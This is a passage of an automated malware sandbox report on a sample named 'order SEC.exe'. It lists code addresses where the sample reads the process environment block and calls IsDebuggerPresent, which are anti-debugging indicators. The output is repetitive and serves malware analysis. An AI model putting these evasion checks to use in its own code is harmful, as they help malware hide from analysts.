        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0115454A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0115454A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0115454A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_0115454A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058AE58A mov ecx, dword ptr fs:[00000030h]0_2_058AE58A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058AE58A mov eax, dword ptr fs:[00000030h]0_2_058AE58A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058AE58A mov eax, dword ptr fs:[00000030h]0_2_058AE58A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058AE58A mov eax, dword ptr fs:[00000030h]0_2_058AE58A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D8589 mov eax, dword ptr fs:[00000030h]0_2_058D8589
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C0D8A mov eax, dword ptr fs:[00000030h]0_2_058C0D8A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05830584 mov eax, dword ptr fs:[00000030h]0_2_05830584
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CE581 mov eax, dword ptr fs:[00000030h]0_2_058CE581
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582F591 mov eax, dword ptr fs:[00000030h]0_2_0582F591
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582F591 mov eax, dword ptr fs:[00000030h]0_2_0582F591
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582F591 mov eax, dword ptr fs:[00000030h]0_2_0582F591
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D5595 mov eax, dword ptr fs:[00000030h]0_2_058D5595
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821D9D mov eax, dword ptr fs:[00000030h]0_2_05821D9D
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821D9D mov eax, dword ptr fs:[00000030h]0_2_05821D9D
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821D9D mov eax, dword ptr fs:[00000030h]0_2_05821D9D
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821D9D mov eax, dword ptr fs:[00000030h]0_2_05821D9D
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821D9D mov eax, dword ptr fs:[00000030h]0_2_05821D9D
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C15A8 mov eax, dword ptr fs:[00000030h]0_2_058C15A8
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05802DAA mov eax, dword ptr fs:[00000030h]0_2_05802DAA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05802DAA mov eax, dword ptr fs:[00000030h]0_2_05802DAA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05802DAA mov eax, dword ptr fs:[00000030h]0_2_05802DAA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05802DAA mov eax, dword ptr fs:[00000030h]0_2_05802DAA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05802DAA mov eax, dword ptr fs:[00000030h]0_2_05802DAA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05849DAF mov eax, dword ptr fs:[00000030h]0_2_05849DAF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058035B1 mov eax, dword ptr fs:[00000030h]0_2_058035B1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058095C0 mov eax, dword ptr fs:[00000030h]0_2_058095C0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058095C0 mov ecx, dword ptr fs:[00000030h]0_2_058095C0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05884DCA mov eax, dword ptr fs:[00000030h]0_2_05884DCA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05884DCA mov eax, dword ptr fs:[00000030h]0_2_05884DCA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05816DE1 mov eax, dword ptr fs:[00000030h]0_2_05816DE1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05816DE1 mov eax, dword ptr fs:[00000030h]0_2_05816DE1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05816DE1 mov eax, dword ptr fs:[00000030h]0_2_05816DE1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05816DE1 mov eax, dword ptr fs:[00000030h]0_2_05816DE1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05816DE1 mov eax, dword ptr fs:[00000030h]0_2_05816DE1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05816DE1 mov eax, dword ptr fs:[00000030h]0_2_05816DE1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058015E1 mov eax, dword ptr fs:[00000030h]0_2_058015E1
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D85EA mov eax, dword ptr fs:[00000030h]0_2_058D85EA
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058B1DE3 mov ecx, dword ptr fs:[00000030h]0_2_058B1DE3
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058B1DE3 mov ecx, dword ptr fs:[00000030h]0_2_058B1DE3
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058B1DE3 mov eax, dword ptr fs:[00000030h]0_2_058B1DE3
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D6DFD mov eax, dword ptr fs:[00000030h]0_2_058D6DFD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D6DFD mov eax, dword ptr fs:[00000030h]0_2_058D6DFD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D6DFD mov eax, dword ptr fs:[00000030h]0_2_058D6DFD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058375F0 mov eax, dword ptr fs:[00000030h]0_2_058375F0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058375F0 mov eax, dword ptr fs:[00000030h]0_2_058375F0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05832DF0 mov eax, dword ptr fs:[00000030h]0_2_05832DF0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C0D1B mov eax, dword ptr fs:[00000030h]0_2_058C0D1B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05893D10 mov eax, dword ptr fs:[00000030h]0_2_05893D10
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D952E mov eax, dword ptr fs:[00000030h]0_2_058D952E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583E52F mov ecx, dword ptr fs:[00000030h]0_2_0583E52F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583E52F mov eax, dword ptr fs:[00000030h]0_2_0583E52F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583E52F mov eax, dword ptr fs:[00000030h]0_2_0583E52F
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821530 mov eax, dword ptr fs:[00000030h]0_2_05821530
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05895D55 mov eax, dword ptr fs:[00000030h]0_2_05895D55
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05895D55 mov eax, dword ptr fs:[00000030h]0_2_05895D55
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05895D55 mov eax, dword ptr fs:[00000030h]0_2_05895D55
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583056B mov eax, dword ptr fs:[00000030h]0_2_0583056B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0580356C mov eax, dword ptr fs:[00000030h]0_2_0580356C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0580356C mov eax, dword ptr fs:[00000030h]0_2_0580356C
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05817488 mov eax, dword ptr fs:[00000030h]0_2_05817488
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov ecx, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811C8E mov eax, dword ptr fs:[00000030h]0_2_05811C8E
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C0C9A mov eax, dword ptr fs:[00000030h]0_2_058C0C9A
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C3490 mov eax, dword ptr fs:[00000030h]0_2_058C3490
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058014A0 mov eax, dword ptr fs:[00000030h]0_2_058014A0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058D84CD mov eax, dword ptr fs:[00000030h]0_2_058D84CD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0580ACC0 mov eax, dword ptr fs:[00000030h]0_2_0580ACC0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582E4C6 mov eax, dword ptr fs:[00000030h]0_2_0582E4C6
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0582E4C6 mov eax, dword ptr fs:[00000030h]0_2_0582E4C6
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05804CD0 mov eax, dword ptr fs:[00000030h]0_2_05804CD0
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811CDD mov eax, dword ptr fs:[00000030h]0_2_05811CDD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811CDD mov eax, dword ptr fs:[00000030h]0_2_05811CDD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05811CDD mov eax, dword ptr fs:[00000030h]0_2_05811CDD
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058C44EF mov eax, dword ptr fs:[00000030h]0_2_058C44EF
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05802CFB mov eax, dword ptr fs:[00000030h]0_2_05802CFB
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0581EC01 mov eax, dword ptr fs:[00000030h]0_2_0581EC01
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05801C09 mov eax, dword ptr fs:[00000030h]0_2_05801C09
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_05821410 mov ecx, dword ptr fs:[00000030h]0_2_05821410
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583341B mov eax, dword ptr fs:[00000030h]0_2_0583341B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583341B mov eax, dword ptr fs:[00000030h]0_2_0583341B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_0583341B mov eax, dword ptr fs:[00000030h]0_2_0583341B
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CA416 mov eax, dword ptr fs:[00000030h]0_2_058CA416
        Source: C:\Users\user\Desktop\order SEC.exeCode function: 0_2_058CA416 mov ea